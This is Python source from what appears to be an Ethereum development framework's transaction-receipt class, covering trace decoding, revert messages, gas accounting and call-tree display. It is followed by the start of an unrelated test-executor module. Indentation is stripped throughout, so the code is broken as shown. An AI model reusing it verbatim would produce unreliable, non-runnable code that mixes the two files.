if self._revert_msg is None:
self._get_trace()
elif self.contract_address and self._revert_msg == "out of gas":
self._get_trace()
return self._revert_msg
@trace_property
def dev_revert_msg(self) -> Optional[str]:
if self.status:
return None
if self._dev_revert_msg is None:
self._get_trace()
return self._dev_revert_msg or None
@trace_property
def subcalls(self) -> Optional[List]:
if self._subcalls is None:
self._expand_trace()
return self._subcalls
@trace_property
def trace(self) -> Optional[List]:
if self._trace is None:
self._expand_trace()
return self._trace
@property
def timestamp(self) -> Optional[int]:
if self.status < 0:
return None
return web3.eth.get_block(self.block_number)["timestamp"]
@property
def confirmations(self) -> int:
if not self.block_number:
return 0
return web3.eth.block_number - self.block_number + 1
def replace(
self,
increment: Optional[float] = None,
gas_price: Optional[Wei] = None,
silent: Optional[bool] = None,
) -> "TransactionReceipt":
"""
Rebroadcast this transaction with a higher gas price.
Exactly one of `increment` and `gas_price` must be given.
Arguments
---------
increment : float, optional
Multiplier applied to the gas price of this transaction in order
to determine the new gas price
gas_price : Wei, optional
Absolute gas price to use in the replacement transaction
silent : bool, optional
Toggle console verbosity (default is same setting as this transaction)
Returns
-------
TransactionReceipt
New transaction object
"""
if increment is None and gas_price is None:
raise ValueError("Must give one of `increment` or `gas_price`")
if gas_price is not None and increment is not None:
raise ValueError("Cannot set `increment` and `gas_price` together")
if self.status > -1:
raise ValueError("Transaction has already confirmed")
if increment is not None:
gas_price = Wei(self.gas_price * increment)
if silent is None:
silent = self._silent
sender = self.sender
if isinstance(sender, EthAddress):
# if the transaction wasn't broadcast during this brownie session,
# check if the sender is unlocked - we might be able to replace anyway
from brownie import accounts
if sender in accounts:
sender = accounts.at(sender)
else:
raise ValueError("Sender address not in `accounts`")
return sender.transfer( # type: ignore
self.receiver,
self.value,
gas_limit=self.gas_limit,
gas_price=Wei(gas_price),
data=self.input,
nonce=self.nonce,
required_confs=0,
silent=silent,
)
def wait(self, required_confs: int) -> None:
if required_confs < 1:
return
if self.confirmations > required_confs:
print(f"This transaction already has {self.confirmations} confirmations.")
return
while True:
try:
tx: Dict = web3.eth.get_transaction(self.txid)
break
except TransactionNotFound:
if self.nonce is not None:
sender_nonce = web3.eth.get_transaction_count(str(self.sender))
if sender_nonce > self.nonce:
self.status = Status(-2)
self._confirmed.set()
return
time.sleep(1)
self._await_confirmation(tx["blockNumber"], required_confs)
def _raise_if_reverted(self, exc: Any) -> None:
if self.status or CONFIG.mode == "console":
return
if not web3.supports_traces:
# if traces are not available, do not attempt to determine the revert reason
raise exc or ValueError("Execution reverted")
if self._dev_revert_msg is None:
# no revert message and unable to check dev string - have to get trace
self._expand_trace()
if self.contract_address:
source = ""
elif CONFIG.argv["revert"]:
source = self._traceback_string()
else:
source = self._error_string(1)
raise exc._with_attr(
source=source, revert_msg=self._revert_msg, dev_revert_msg=self._dev_revert_msg
)
def _await_transaction(self, required_confs: int, is_blocking: bool) -> None:
# await tx showing in mempool
while True:
try:
tx: Dict = web3.eth.get_transaction(HexBytes(self.txid))
break
except (TransactionNotFound, ValueError):
if self.sender is None:
# if sender was not explicitly set, this transaction was
# not broadcasted locally and so likely doesn't exist
raise
if self.nonce is not None:
sender_nonce = web3.eth.get_transaction_count(str(self.sender))
if sender_nonce > self.nonce:
self.status = Status(-2)
return
time.sleep(1)
self._set_from_tx(tx)
if not self._silent:
print(
f" Gas price: {color('bright blue')}{self.gas_price / 10 ** 9}{color} gwei"
f" Gas limit: {color('bright blue')}{self.gas_limit}{color}"
f" Nonce: {color('bright blue')}{self.nonce}{color}"
)
# await confirmation of tx in a separate thread which is blocking if
# required_confs > 0 or tx has already confirmed (`blockNumber` != None)
confirm_thread = threading.Thread(
target=self._await_confirmation, args=(tx["blockNumber"], required_confs), daemon=True
)
confirm_thread.start()
if is_blocking and (required_confs > 0 or tx["blockNumber"]):
confirm_thread.join()
def _await_confirmation(self, block_number: int = None, required_confs: int = 1) -> None:
block_number = block_number or self.block_number
if not block_number and not self._silent and required_confs > 0:
if required_confs == 1:
sys.stdout.write("\rWaiting for confirmation... ")
else:
sys.stdout.write(
f"\rRequired confirmations: {color('bright yellow')}0/{required_confs}{color}"
)
sys.stdout.flush()
# await first confirmation
while True:
# if sender nonce is greater than tx nonce, the tx should be confirmed
sender_nonce = web3.eth.get_transaction_count(str(self.sender))
expect_confirmed = bool(sender_nonce > self.nonce) # type: ignore
try:
receipt = web3.eth.wait_for_transaction_receipt(
HexBytes(self.txid), timeout=15, poll_latency=1
)
break
except TimeExhausted:
if expect_confirmed:
# if we expected confirmation based on the nonce, tx likely dropped
self.status = Status(-2)
self._confirmed.set()
return
self.block_number = receipt["blockNumber"]
# wait for more confirmations if required and handle uncle blocks
remaining_confs = required_confs
while remaining_confs > 0 and required_confs > 1:
try:
receipt = web3.eth.get_transaction_receipt(self.txid)
self.block_number = receipt["blockNumber"]
except TransactionNotFound:
if not self._silent:
sys.stdout.write(f"\r{color('red')}Transaction was lost...{color}{' ' * 8}")
sys.stdout.flush()
# check if tx is still in mempool, this will raise otherwise
tx = web3.eth.get_transaction(self.txid)
self.block_number = None
return self._await_confirmation(tx["blockNumber"], required_confs)
if required_confs - self.confirmations != remaining_confs:
remaining_confs = required_confs - self.confirmations
if not self._silent:
sys.stdout.write(
f"\rRequired confirmations: {color('bright yellow')}{self.confirmations}/"
f"{required_confs}{color} "
)
if remaining_confs == 0:
sys.stdout.write("\n")
sys.stdout.flush()
if remaining_confs > 0:
time.sleep(1)
self._set_from_receipt(receipt)
# if coverage evaluation is active, evaluate the trace
if (
CONFIG.argv["coverage"]
and not coverage._check_cached(self.coverage_hash)
and self.trace
):
self._expand_trace()
if not self._silent and required_confs > 0:
print(self._confirm_output())
# set the confirmation event and mark other tx's with the same nonce as dropped
self._confirmed.set()
for dropped_tx in state.TxHistory().filter(
sender=self.sender, nonce=self.nonce, key=lambda k: k != self
):
dropped_tx.status = Status(-2)
dropped_tx._confirmed.set()
def _set_from_tx(self, tx: Dict) -> None:
if not self.sender:
self.sender = EthAddress(tx["from"])
self.receiver = EthAddress(tx["to"]) if tx["to"] else None
self.value = Wei(tx["value"])
self.gas_price = tx["gasPrice"]
self.gas_limit = tx["gas"]
self.input = tx["input"]
self.nonce = tx["nonce"]
# if receiver is a known contract, set function name
if self.fn_name:
return
try:
contract = state._find_contract(tx["to"])
if contract is not None:
self.contract_name = contract._name
self.fn_name = contract.get_method(tx["input"])
except ContractNotFound:
# required in case the contract has self destructed
# other aspects of functionality will be broken, but this way we
# can at least return a receipt
pass
def _set_from_receipt(self, receipt: Dict) -> None:
"""Sets object attributes based on the transaction reciept."""
self.block_number = receipt["blockNumber"]
self.txindex = receipt["transactionIndex"]
self.gas_used = receipt["gasUsed"]
self.logs = receipt["logs"]
self.status = Status(receipt["status"])
self.contract_address = receipt["contractAddress"]
if self.contract_address and not self.contract_name:
self.contract_name = "UnknownContract"
base = (
f"{self.nonce}{self.block_number}{self.sender}{self.receiver}"
f"{self.value}{self.input}{int(self.status)}{self.gas_used}{self.txindex}"
)
self.coverage_hash = sha1(base.encode()).hexdigest()
if self.fn_name:
state.TxHistory()._gas(self._full_name(), receipt["gasUsed"], self.status == Status(1))
def _confirm_output(self) -> str:
status = ""
if not self.status:
revert_msg = self.revert_msg if web3.supports_traces else None
status = f"({color('bright red')}{revert_msg or 'reverted'}{color}) "
result = (
f"\r {self._full_name()} confirmed {status}- "
f"Block: {color('bright blue')}{self.block_number}{color} "
f"Gas used: {color('bright blue')}{self.gas_used}{color} "
f"({color('bright blue')}{self.gas_used / self.gas_limit:.2%}{color})"
)
if self.status and self.contract_address:
result += (
f"\n {self.contract_name} deployed at: "
f"{color('bright blue')}{self.contract_address}{color}"
)
return result + "\n"
def _get_trace(self) -> None:
"""Retrieves the stack trace via debug_traceTransaction and finds the
return value, revert message and event logs in the trace.
"""
# check if trace has already been retrieved, or the tx warrants it
if self._raw_trace is not None:
return
self._raw_trace = []
if self.input == "0x" and self.gas_used == 21000:
self._modified_state = False
self._trace = []
return
if not web3.supports_traces:
raise RPCRequestError("Node client does not support `debug_traceTransaction`")
try:
trace = web3.provider.make_request( # type: ignore
"debug_traceTransaction", (self.txid, {"disableStorage": CONFIG.mode != "console"})
)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
msg = f"Encountered a {type(e).__name__} while requesting "
msg += "`debug_traceTransaction`. The local RPC client has likely crashed."
if CONFIG.argv["coverage"]:
msg += " If the error persists, add the `skip_coverage` marker to this test."
raise RPCRequestError(msg) from None
if "error" in trace:
self._modified_state = None
self._trace_exc = RPCRequestError(trace["error"]["message"])
raise self._trace_exc
self._raw_trace = trace = trace["result"]["structLogs"]
if not trace:
self._modified_state = False
return
if isinstance(trace[0]["gas"], str):
# handle traces where numeric values are returned as hex (Nethermind)
for step in trace:
step["gas"] = int(step["gas"], 16)
step["gasCost"] = int.from_bytes(HexBytes(step["gasCost"]), "big", signed=True)
step["pc"] = int(step["pc"], 16)
if self.status:
self._confirmed_trace(trace)
else:
self._reverted_trace(trace)
def _confirmed_trace(self, trace: Sequence) -> None:
self._modified_state = next((True for i in trace if i["op"] == "SSTORE"), False)
if trace[-1]["op"] != "RETURN" or self.contract_address:
return
contract = state._find_contract(self.receiver)
if contract:
data = _get_memory(trace[-1], -1)
fn = contract.get_method_object(self.input)
self._return_value = fn.decode_output(data)
def _reverted_trace(self, trace: Sequence) -> None:
self._modified_state = False
if self.contract_address:
step = next((i for i in trace if i["op"] == "CODECOPY"), None)
if step is not None and int(step["stack"][-3], 16) > 24577:
self._revert_msg = "exceeds EIP-170 size limit"
self._dev_revert_msg = ""
if self._dev_revert_msg is not None:
return
# iterate over revert instructions in reverse to find revert message
for step in (i for i in trace[::-1] if i["op"] in ("REVERT", "INVALID")):
if step["op"] == "REVERT" and int(step["stack"][-2], 16):
# get returned error string from stack
data = _get_memory(step, -1)
if data[:4].hex() == "0x4e487b71": # keccak of Panic(uint256)
error_code = int(data[4:].hex(), 16)
if error_code in SOLIDITY_ERROR_CODES:
self._revert_msg = SOLIDITY_ERROR_CODES[error_code]
else:
self._revert_msg = f"Panic (error code: {error_code})"
else:
self._revert_msg = decode_abi(["string"], data[4:])[0]
elif self.contract_address:
self._revert_msg = "invalid opcode" if step["op"] == "INVALID" else ""
self._dev_revert_msg = ""
return
# check for dev revert string using program counter
dev_revert = build._get_dev_revert(step["pc"]) or None
if dev_revert is not None:
self._dev_revert_msg = dev_revert
if self._revert_msg is None:
self._revert_msg = dev_revert
else:
# if none is found, expand the trace and get it from the pcMap
self._expand_trace()
try:
contract = state._find_contract(step["address"])
pc_map = contract._build["pcMap"]
# if this is the function selector revert, check for a jump
if "first_revert" in pc_map[step["pc"]]:
idx = trace.index(step) - 4
if trace[idx]["pc"] != step["pc"] - 4:
step = trace[idx]
# if this is the optimizer revert, find the actual source
if "optimizer_revert" in pc_map[step["pc"]]:
idx = trace.index(step) - 1
# look for the most recent jump
while trace[idx + 1]["op"] != "JUMPDEST":
if trace[idx]["source"] != step["source"]:
# if we find another line with a differing source offset prior
# to a JUMPDEST, the optimizer revert is also the actual revert
idx = trace.index(step)
break
idx -= 1
while not trace[idx]["source"]:
# now we're in a yul optimization, keep stepping back
# until we find a source offset
idx -= 1
# at last we have the real location of the revert
step["source"] = trace[idx]["source"]
step = trace[idx]
# breakpoint()
if "dev" in pc_map[step["pc"]]:
self._dev_revert_msg = pc_map[step["pc"]]["dev"]
else:
# extract the dev revert string from the source code
# TODO this technique appears superior to `_get_dev_revert`, and
# changes in solc 0.8.0 have necessitated it. the old approach
# of building a dev revert map should be refactored out in favor
# of this one.
source = contract._sources.get(step["source"]["filename"])
offset = step["source"]["offset"][1]
line = source[offset:].split("\n")[0]
marker = "//" if contract._build["language"] == "Solidity" else "#"
revert_str = line[line.index(marker) + len(marker) :].strip()
if revert_str.startswith("dev:"):
self._dev_revert_msg = revert_str
if self._revert_msg is None:
self._revert_msg = self._dev_revert_msg
return
except (KeyError, AttributeError, TypeError, ValueError):
pass
if self._revert_msg is not None:
if self._dev_revert_msg is None:
self._dev_revert_msg = ""
return
op = next((i["op"] for i in trace[::-1] if i["op"] in ("REVERT", "INVALID")), None)
self._revert_msg = "invalid opcode" if op == "INVALID" else ""
def _expand_trace(self) -> None:
"""Adds the following attributes to each step of the stack trace:
address: The address executing this contract.
contractName: The name of the contract.
fn: The name of the function.
jumpDepth: Number of jumps made since entering this contract. The
initial value is 0.
source: {
filename: path to the source file for this step
offset: Start and end offset associated source code
}
"""
if self._raw_trace is None:
self._get_trace()
if self._trace is not None:
# in case `_get_trace` also expanded the trace, do not repeat
return
self._trace = trace = self._raw_trace
self._new_contracts = []
self._internal_transfers = []
self._subcalls = []
if self.contract_address or not trace:
coverage._add_transaction(self.coverage_hash, {})
return
if trace[0]["depth"] == 1:
self._trace_origin = "geth"
self._call_cost = self.gas_used - trace[0]["gas"] + trace[-1]["gas"]
for t in trace:
t["depth"] = t["depth"] - 1
else:
self._trace_origin = "ganache"
if trace[0]["gasCost"] >= 21000:
# in ganache <6.10.0, gas costs are shifted by one step - we can
# identify this when the first step has a gas cost >= 21000
self._call_cost = trace[0]["gasCost"]
for i in range(len(trace) - 1):
trace[i]["gasCost"] = trace[i + 1]["gasCost"]
trace[-1]["gasCost"] = 0
else:
self._call_cost = self.gas_used - trace[0]["gas"] + trace[-1]["gas"]
# last_map gives a quick reference of previous values at each depth
last_map = {0: _get_last_map(self.receiver, self.input[:10])} # type: ignore
coverage_eval: Dict = {last_map[0]["name"]: {}}
for i in range(len(trace)):
# if depth has increased, tx has called into a different contract
if trace[i]["depth"] > trace[i - 1]["depth"]:
step = trace[i - 1]
if step["op"] in ("CREATE", "CREATE2"):
# creating a new contract
out = next(x for x in trace[i:] if x["depth"] == step["depth"])
address = out["stack"][-1][-40:]
sig = f"<{step['op']}>"
calldata = None
self._new_contracts.append(EthAddress(address))
if int(step["stack"][-1], 16):
self._add_internal_xfer(step["address"], address, step["stack"][-1])
else:
# calling an existing contract
stack_idx = -4 if step["op"] in ("CALL", "CALLCODE") else -3
offset = int(step["stack"][stack_idx], 16)
length = int(step["stack"][stack_idx - 1], 16)
calldata = HexBytes("".join(step["memory"]))[offset : offset + length]
sig = calldata[:4].hex()
address = step["stack"][-2][-40:]
last_map[trace[i]["depth"]] = _get_last_map(address, sig)
coverage_eval.setdefault(last_map[trace[i]["depth"]]["name"], {})
self._subcalls.append(
{"from": step["address"], "to": EthAddress(address), "op": step["op"]}
)
if step["op"] in ("CALL", "CALLCODE"):
self._subcalls[-1]["value"] = int(step["stack"][-3], 16)
if calldata and last_map[trace[i]["depth"]].get("function"):
fn = last_map[trace[i]["depth"]]["function"]
self._subcalls[-1]["function"] = fn._input_sig
try:
zip_ = zip(fn.abi["inputs"], fn.decode_input(calldata))
inputs = {i[0]["name"]: i[1] for i in zip_} # type: ignore
self._subcalls[-1]["inputs"] = inputs
except Exception:
self._subcalls[-1]["calldata"] = calldata.hex()
elif calldata:
self._subcalls[-1]["calldata"] = calldata.hex()
# update trace from last_map
last = last_map[trace[i]["depth"]]
trace[i].update(
address=last["address"],
contractName=last["name"],
fn=last["internal_calls"][-1],
jumpDepth=last["jumpDepth"],
source=False,
)
opcode = trace[i]["op"]
if opcode == "CALL" and int(trace[i]["stack"][-3], 16):
self._add_internal_xfer(
last["address"], trace[i]["stack"][-2][-40:], trace[i]["stack"][-3]
)
try:
pc = last["pc_map"][trace[i]["pc"]]
except (KeyError, TypeError):
# we don't have enough information about this contract
continue
if trace[i]["depth"] and opcode in ("RETURN", "REVERT", "INVALID", "SELFDESTRUCT"):
subcall: dict = next(
i for i in self._subcalls[::-1] if i["to"] == last["address"] # type: ignore
)
if opcode == "RETURN":
returndata = _get_memory(trace[i], -1)
if returndata:
fn = last["function"]
try:
return_values = fn.decode_output(returndata)
if len(fn.abi["outputs"]) == 1:
return_values = (return_values,)
subcall["return_value"] = return_values
except Exception:
subcall["returndata"] = returndata.hex()
else:
subcall["return_value"] = None
elif opcode == "SELFDESTRUCT":
subcall["selfdestruct"] = True
else:
if opcode == "REVERT":
data = _get_memory(trace[i], -1)
if len(data) > 4:
try:
subcall["revert_msg"] = decode_abi(["string"], data[4:])[0]
except Exception:
subcall["revert_msg"] = data.hex()
if "revert_msg" not in subcall and "dev" in pc:
subcall["revert_msg"] = pc["dev"]
if "path" not in pc:
continue
trace[i]["source"] = {"filename": last["path_map"][pc["path"]], "offset": pc["offset"]}
if "fn" not in pc:
continue
# calculate coverage
if last["coverage"]:
if pc["path"] not in coverage_eval[last["name"]]:
coverage_eval[last["name"]][pc["path"]] = [set(), set(), set()]
if "statement" in pc:
coverage_eval[last["name"]][pc["path"]][0].add(pc["statement"])
if "branch" in pc:
if pc["op"] != "JUMPI":
last["active_branches"].add(pc["branch"])
elif "active_branches" not in last or pc["branch"] in last["active_branches"]:
# false, true
key = 1 if trace[i + 1]["pc"] == trace[i]["pc"] + 1 else 2
coverage_eval[last["name"]][pc["path"]][key].add(pc["branch"])
if "active_branches" in last:
last["active_branches"].remove(pc["branch"])
# ignore jumps with no function - they are compiler optimizations
if "jump" in pc:
# jump 'i' is calling into an internal function
if pc["jump"] == "i":
try:
fn = last["pc_map"][trace[i + 1]["pc"]]["fn"]
except (KeyError, IndexError):
continue
if fn != last["internal_calls"][-1]:
last["internal_calls"].append(fn)
last["jumpDepth"] += 1
# jump 'o' is returning from an internal function
elif last["jumpDepth"] > 0:
del last["internal_calls"][-1]
last["jumpDepth"] -= 1
coverage._add_transaction(
self.coverage_hash, dict((k, v) for k, v in coverage_eval.items() if v)
)
def _add_internal_xfer(self, from_: str, to: str, value: str) -> None:
self._internal_transfers.append( # type: ignore
{"from": EthAddress(from_), "to": EthAddress(to), "value": Wei(f"0x{value}")}
)
def _full_name(self) -> str:
if self.contract_name and self.fn_name:
return f"{self.contract_name}.{self.fn_name}"
return self.fn_name or "Transaction"
def info(self) -> None:
"""Displays verbose information about the transaction, including decoded event logs."""
result = f"Tx Hash: {self.txid}\nFrom: {self.sender}\n"
if self.contract_address and self.status:
result += f"New {self.contract_name} address: {self.contract_address}\n"
else:
result += f"To: {self.receiver}\n" f"Value: {self.value}\n"
if self.input != "0x" and int(self.input, 16):
result += f"Function: {self._full_name()}\n"
result += (
f"Block: {self.block_number}\nGas Used: "
f"{self.gas_used} / {self.gas_limit} "
f"({self.gas_used / self.gas_limit:.1%})\n"
)
if self.events:
events = list(self.events)
call_tree: List = ["--------------------------"]
while events:
idx = next(
(events.index(i) for i in events if i.address != events[0].address), len(events)
)
contract = state._find_contract(events[0].address)
if contract:
try:
name = contract.name()
except Exception:
name = contract._name
sub_tree: List = [f"{name} ({events[0].address})"]
else:
sub_tree = [f"{events[0].address}"]
for event in events[:idx]:
sub_tree.append([event.name, *(f"{k}: {v}" for k, v in event.items())])
call_tree.append(sub_tree)
events = events[idx:]
event_tree = build_tree([call_tree], multiline_pad=0, pad_depth=[0, 1])
result = f"{result}\nEvents In This Transaction\n{event_tree}"
result = color.highlight(result)
status = ""
if not self.status:
status = f"({color('bright red')}{self.revert_msg or 'reverted'}{color})"
print(f"Transaction was Mined {status}\n---------------------\n{result}")
def _get_trace_gas(self, start: int, stop: int) -> Tuple[int, int]:
total_gas = 0
internal_gas = 0
is_internal = True
trace = self.trace
for i in range(start, stop):
# Check if we are in a subfunction or not
if is_internal and not _step_compare(trace[i], trace[start]):
is_internal = False
# For the internal gas tracking we ignore the gas passed to an external call
if trace[i]["depth"] > trace[start]["depth"]:
internal_gas -= trace[i - 1]["gasCost"]
elif not is_internal and _step_compare(trace[i], trace[start]):
is_internal = True
total_gas += trace[i]["gasCost"]
if is_internal:
internal_gas += trace[i]["gasCost"]
# manually add gas refunds where they occur
if trace[i]["op"] == "SSTORE" and int(trace[i]["stack"][-2], 16) == 0:
# 15000 gas is refunded if a word is set to 0x0
# Note: There is currently no way to check if the value was 0x0 before.
# This will give an incorrect refund if 0x0 is assigned to 0x0.
total_gas -= 15000
if is_internal:
internal_gas -= 15000
if trace[i]["op"] == "SELFDESTRUCT":
# 24000 gas is refunded on selfdestruct
total_gas -= 24000
if is_internal:
internal_gas -= 24000
# For external calls, add the remaining gas returned back
if start > 0 and trace[start]["depth"] > trace[start - 1]["depth"]:
total_gas += trace[start - 1]["gasCost"]
internal_gas += trace[start - 1]["gasCost"]
return internal_gas, total_gas
@trace_inspection
def call_trace(self, expand: bool = False) -> None:
"""
Display the complete sequence of contracts and methods called during
the transaction. The format:
Contract.functionName [instruction] start:stop [gas used]
* start:stop are index values for the `trace` member of this object,
showing the points where the call begins and ends
* for calls that include subcalls, gas use is displayed as
[gas used in this frame / gas used in this frame + subcalls]
* Calls displayed in red ended with a `REVERT` or `INVALID` instruction.
Arguments
---------
expand : bool
If `True`, show an expanded call trace including inputs and return values
"""
trace = self.trace
key = _step_internal(
trace[0], trace[-1], 0, len(trace), self._get_trace_gas(0, len(self.trace))
)
call_tree: List = [[key]]
active_tree: List = [call_tree[0]]
# (index, depth, jumpDepth) for relevent steps in the trace
trace_index = [(0, 0, 0)] + [
(i, trace[i]["depth"], trace[i]["jumpDepth"])
for i in range(1, len(trace))
if not _step_compare(trace[i], trace[i - 1])
]
subcalls = self.subcalls[::-1]
for i, (idx, depth, jump_depth) in enumerate(trace_index[1:], start=1):
last = trace_index[i - 1]
if depth == last[1] and jump_depth < last[2]:
# returning from an internal function, reduce tree by one
active_tree.pop()
continue
elif depth < last[1]:
# returning from an external call, return tree by jumpDepth of the previous depth
active_tree = active_tree[: -(last[2] + 1)]
continue
if depth > last[1]:
# called to a new contract
end = next((x[0] for x in trace_index[i + 1 :] if x[1] < depth), len(trace))
total_gas, internal_gas = self._get_trace_gas(idx, end)
key = _step_external(
trace[idx],
trace[end - 1],
idx,
end,
(total_gas, internal_gas),
subcalls.pop(),
expand,
)
elif depth == last[1] and jump_depth > last[2]:
# jumped into an internal function
end = next(
(
x[0]
for x in trace_index[i + 1 :]
if x[1] < depth or (x[1] == depth and x[2] < jump_depth)
),
len(trace),
)
total_gas, internal_gas = self._get_trace_gas(idx, end)
key = _step_internal(
trace[idx], trace[end - 1], idx, end, (total_gas, internal_gas)
)
active_tree[-1].append([key])
active_tree.append(active_tree[-1][-1])
print(
f"Call trace for '{color('bright blue')}{self.txid}{color}':\n"
f"Initial call cost [{color('bright yellow')}{self._call_cost} gas{color}]"
)
print(build_tree(call_tree).rstrip())
def traceback(self) -> None:
print(self._traceback_string() or "")
@trace_inspection
def _traceback_string(self) -> str:
"""Returns an error traceback for the transaction."""
if self.status == 1:
return ""
trace = self.trace
try:
idx = next(i for i in range(len(trace)) if trace[i]["op"] in ("REVERT", "INVALID"))
trace_range = range(idx, -1, -1)
except StopIteration:
return ""
try:
result = [next(i for i in trace_range if trace[i]["source"])]
except StopIteration:
return ""
depth, jump_depth = trace[idx]["depth"], trace[idx]["jumpDepth"]
while True:
try:
idx = next(
i
for i in trace_range
if trace[i]["depth"] < depth
or (trace[i]["depth"] == depth and trace[i]["jumpDepth"] < jump_depth)
)
result.append(idx)
depth, jump_depth = trace[idx]["depth"], trace[idx]["jumpDepth"]
except StopIteration:
break
return f"{color}Traceback for '{color('bright blue')}{self.txid}{color}':\n" + "\n".join(
self._source_string(i, 0) for i in result[::-1]
)
def error(self, pad: int = 3) -> None:
print(self._error_string(pad) or "")
@trace_inspection
def _error_string(self, pad: int = 3) -> str:
"""Returns the source code that caused the transaction to revert.
Args:
pad: Number of unrelated lines of code to include before and after
Returns: source code string
"""
if self.status == 1:
return ""
# if RPC returned a program counter, try to find source without querying trace
if self._revert_pc:
highlight, linenos, path, fn_name = build._get_error_source_from_pc(self._revert_pc)
if highlight:
return _format_source(highlight, linenos, path, self._revert_pc, -1, fn_name)
self._revert_pc = None
# iterate backward through the trace until a step has a source offset
trace = self.trace
trace_range = range(len(trace) - 1, -1, -1)
try:
idx = next(i for i in trace_range if trace[i]["op"] in {"REVERT", "INVALID"})
idx = next(i for i in trace_range if trace[i]["source"])
return self._source_string(idx, pad)
except StopIteration:
return ""
def source(self, idx: int, pad: int = 3) -> None:
print(self._source_string(idx, pad) or "")
@trace_inspection
def _source_string(self, idx: int, pad: int) -> str:
"""Displays the associated source code for a given stack trace step.
Args:
idx: Stack trace step index
pad: Number of unrelated lines of code to include before and after
Returns: source code string
"""
trace = self.trace[idx]
if not trace.get("source", None):
return ""
contract = state._find_contract(self.trace[idx]["address"])
source, linenos = highlight_source(
contract._sources.get(trace["source"]["filename"]), trace["source"]["offset"], pad
)
if not source:
return ""
return _format_source(
source,
linenos,
trace["source"]["filename"],
trace["pc"],
self.trace.index(trace),
trace["fn"],
)
def _format_source(source: str, linenos: Tuple, path: Path, pc: int, idx: int, fn_name: str) -> str:
ln = f" {color('bright blue')}{linenos[0]}"
if linenos[1] > linenos[0]:
ln = f"s{ln}{color('dark white')}-{color('bright blue')}{linenos[1]}"
return (
f"{color('dark white')}Trace step {color('bright blue')}{idx}{color('dark white')}, "
f"program counter {color('bright blue')}{pc}{color('dark white')}:\n {color('dark white')}"
f"File {color('bright magenta')}\"{path}\"{color('dark white')}, line{ln}"
f"{color('dark white')}, in {color('bright cyan')}{fn_name}{color('dark white')}:{source}"
)
def _step_compare(a: Dict, b: Dict) -> bool:
return a["depth"] == b["depth"] and a["jumpDepth"] == b["jumpDepth"]
def _step_internal(
step: Dict,
last_step: Dict,
start: Union[str, int],
stop: Union[str, int],
gas: Tuple[int, int],
subcall: Dict = None,
) -> str:
if last_step["op"] in {"REVERT", "INVALID"} and _step_compare(step, last_step):
contract_color = color("bright red")
else:
contract_color = color("bright cyan") if not step["jumpDepth"] else color()
key = f"{color('dark white')}{contract_color}{step['fn']} {color('dark white')}"
left_bracket = f"{color('dark white')}["
right_bracket = f"{color('dark white')}]"
if subcall:
key = f"{key}[{color}{subcall['op']}{right_bracket} "
key = f"{key}{start}:{stop}{color}"
if gas:
if gas[0] == gas[1]:
gas_str = f"{color('bright yellow')}{gas[0]} gas"
else:
gas_str = f"{color('bright yellow')}{gas[0]} / {gas[1]} gas"
key = f"{key} {left_bracket}{gas_str}{right_bracket}{color}"
if last_step["op"] == "SELFDESTRUCT":
key = f"{key} {left_bracket}{color('bright red')}SELFDESTRUCT{right_bracket}{color}"
return key
def _convert_0x_to_empty_bytes(value: Any) -> Any:
# black cannot parse `0x` without any trailing zeros, so we temporarily
# replace it with an empty bytestring
final = []
for item in value:
if isinstance(item, (list, tuple)):
final.append(_convert_0x_to_empty_bytes(item))
elif str(item) == "0x":
final.append(b"")
else:
final.append(item)
return type(value)(final)
def _format(value: Any) -> str:
if isinstance(value, (list, tuple)):
value = _convert_0x_to_empty_bytes(value)
mode = black.FileMode(line_length=60)
value = black.format_str(str(value), mode=mode).replace('b""', "0x")
return str(value)
def _step_external(
step: Dict,
last_step: Dict,
start: Union[str, int],
stop: Union[str, int],
gas: Tuple[int, int],
subcall: Dict,
expand: bool,
) -> str:
key = _step_internal(step, last_step, start, stop, gas, subcall)
if not expand:
return key
result: List = [key, f"address: {step['address']}"]
if "value" in subcall:
result.append(f"value: {subcall['value']}")
if "inputs" not in subcall:
result.append(f"calldata: {subcall.get('calldata')}")
elif subcall["inputs"]:
result.append(
["input arguments:", *(f"{k}: {_format(v)}" for k, v in subcall["inputs"].items())]
)
else:
result.append("input arguments: None")
if "return_value" in subcall:
value = subcall["return_value"]
if isinstance(value, tuple) and len(value) > 1:
result.append(["return values:", *(_format(i) for i in value)])
else:
if isinstance(value, tuple):
value = value[0]
result.append(f"return value: {_format(value)}")
elif "returndata" in subcall:
result.append(f"returndata: {subcall['returndata']}")
if "revert_msg" in subcall:
result.append(f"revert reason: {color('bright red')}{subcall['revert_msg']}{color}")
return build_tree([result], multiline_pad=0).rstrip()
def _get_memory(step: Dict, idx: int) -> HexBytes:
offset = int(step["stack"][idx], 16)
length = int(step["stack"][idx - 1], 16)
data = HexBytes("".join(step["memory"]))[offset : offset + length]
# append zero-bytes if allocated memory ends before `length` bytes
data = HexBytes(data + b"\x00" * (length - len(data)))
return data
def _get_last_map(address: EthAddress, sig: str) -> Dict:
contract = state._find_contract(address)
last_map = {"address": EthAddress(address), "jumpDepth": 0, "name": None, "coverage": False}
if contract:
if contract.get_method(sig):
full_fn_name = f"{contract._name}.{contract.get_method(sig)}"
else:
full_fn_name = contract._name
last_map.update(
contract=contract,
function=contract.get_method_object(sig),
name=contract._name,
internal_calls=[full_fn_name],
path_map=contract._build.get("allSourcePaths"),
pc_map=contract._build.get("pcMap"),
)
if isinstance(contract._project, project_main.Project):
# only evaluate coverage for contracts that are part of a `Project`
last_map["coverage"] = True
if contract._build["language"] == "Solidity":
last_map["active_branches"] = set()
else:
last_map.update(contract=None, internal_calls=[f"<UnknownContract>.{sig}"], pc_map=None)
return last_map
|
base.py
|
import base64
import hashlib
import io
import json
import os
import threading
import traceback
import socket
import sys
from abc import ABCMeta, abstractmethod
from http.client import HTTPConnection
from typing import Any, Callable, ClassVar, Optional, Tuple, Type, TYPE_CHECKING
from urllib.parse import urljoin, urlsplit, urlunsplit
from .actions import actions
from .protocol import Protocol, BaseProtocolPart
if TYPE_CHECKING:
from ..webdriver_server import WebDriverServer
here = os.path.dirname(__file__)
def executor_kwargs(test_type, test_environment, run_info_data, **kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": test_environment.config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type in ("reftest", "print-reftest"):
executor_kwargs["screenshot_cache"] = test_environment.cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
